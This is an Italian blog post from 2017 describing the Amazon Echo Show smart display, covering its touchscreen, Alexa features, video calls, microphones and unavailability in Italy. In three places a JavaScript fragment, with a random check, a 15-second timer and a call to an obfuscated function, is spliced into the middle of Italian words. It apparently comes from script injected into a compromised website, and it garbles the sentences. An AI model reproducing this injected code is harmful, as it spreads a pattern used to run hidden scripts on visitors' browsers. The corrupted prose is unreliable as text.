Da non perdere!

Amazon Echo Show: Alexa con Schermo

Pubblicato il 16 ottobre 2017
Condividi

amazon echo show alexa

L’evoluzione dell’Home Assistant

Prendete un Amazon Echo, schiacciatelo leggermente, rendetelo rettangolare e infine inserite un display. Perfetto, ora avete il vostro Echo Show.

L’azienda ha deciso di ampliare il mercato smart creandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando un prodotto simile ai due predecessori, ma con un netto cambiamento: lo schermo touch. L’oggetto dispone infatti di un comodo e intuitivo display da 7″ grazie al quale si potrà interagire direttamente con il cervello della macchina.

Esattamente come i due precedenti Echo, anche questo dispone di Alexa, l’assistente virtuale della casa dell’e-commerce che, attraverso il dispositivo, ha la capacità di gestire la propria abitazione.

Attraverso questo nuovo gadget è possibile:

  • Guardare fotografie e videoclip anche offline
  • Guardare filmati su YouTube o su Amazon Prive Video
  • Riprodurre musica con la possibilità di leggere il testo
  • Controllare le videocamere di sorveglianza collegate
  • Fare video chiamate

Le video chiamate sono possibili grazie a una fotocamera interna di 5 megapixel, pensata appositamente per poter parlare con altre persone.

Tuttavia non è sufficiente disporre di uno smartphone per poter sfruttare questa tecnologia perché è richiesto che anche il ricevente possegga un Echo Show. Oppure, in alternativa, l’app ufficiale Alexa.

Posizionati su tutta la superficie del prodotto sono presenti 8 microfoni in grado di captare i  comandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andi anche in presenza di rumori e musica, accompagnati infine da alcuni speaker perfezionati dalla Dolby.

Oltre a questo ampliamento di caratteristiche, l’home assistant disporrà delle precedenti funzioni. Prima tra tutte potrà controllare ogni dispositivo elettronico smart presente in casa e in secondo luogo ordinare tramite i comandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andi vocali un qualsiasi prodotto presente negli sconfinati magazzini Amazon.

Purtroppo non poteva mancare la notizia della sua disponibilità sul suolo italiano: come per i suoi fratelli, anch’esso non è ancora in vendita nel nostro paese. Almeno per ora, quindi, bisognerà accontentarsi e navigare sul portale dell’e-commerce con le nostre mani.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *